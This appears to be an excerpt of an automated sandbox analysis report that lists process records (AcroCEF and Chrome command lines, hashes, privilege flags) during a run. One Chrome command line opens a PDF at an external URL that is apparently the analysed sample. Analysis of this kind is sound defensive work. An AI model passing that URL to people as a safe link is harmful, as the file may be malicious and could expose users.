                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      Show Windows behavior

                                                      Process Token Activities

                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                      General

                                                      Target ID:4
                                                      Start time:06:53:46
                                                      Start date:25/03/2025
                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1616 --field-trial-handle=1564,i,11632145460416929196,16659529241045373654,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                      Imagebase:0x7ff6adce0000
                                                      File size:3'581'912 bytes
                                                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      Show Windows behavior

                                                      Section Activities

                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      Show Windows behavior

                                                      Process Activities

                                                      Show Windows behavior

                                                      Thread Activities

                                                      Show Windows behavior

                                                      Memory Activities

                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                      General

                                                      Target ID:13
                                                      Start time:06:54:09
                                                      Start date:25/03/2025
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                      Imagebase:0x7ff63b000000
                                                      File size:3'388'000 bytes
                                                      MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false
                                                      Show Windows behavior

                                                      File Activities

                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      Show Windows behavior

                                                      COM Activities

                                                      Show Windows behavior

                                                      Process Activities

                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      Show Windows behavior

                                                      Memory Activities

                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      Show Windows behavior

                                                      Process Token Activities


                                                      General

                                                      Target ID:14
                                                      Start time:06:54:10
                                                      Start date:25/03/2025
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2032,i,4995324151274368739,4250573970443959080,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2064 /prefetch:3
                                                      Imagebase:0x7ff63b000000
                                                      File size:3'388'000 bytes
                                                      MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false
                                                      Show Windows behavior

                                                      File Activities

                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      Show Windows behavior

                                                      Memory Activities

                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                      General

                                                      Target ID:18
                                                      Start time:06:54:16
                                                      Start date:25/03/2025
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sallybarmescounsellor.co.uk/pad4.pdf"
                                                      Imagebase:0x7ff63b000000
                                                      File size:3'388'000 bytes
                                                      MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                      Disassembly

                                                      No disassembly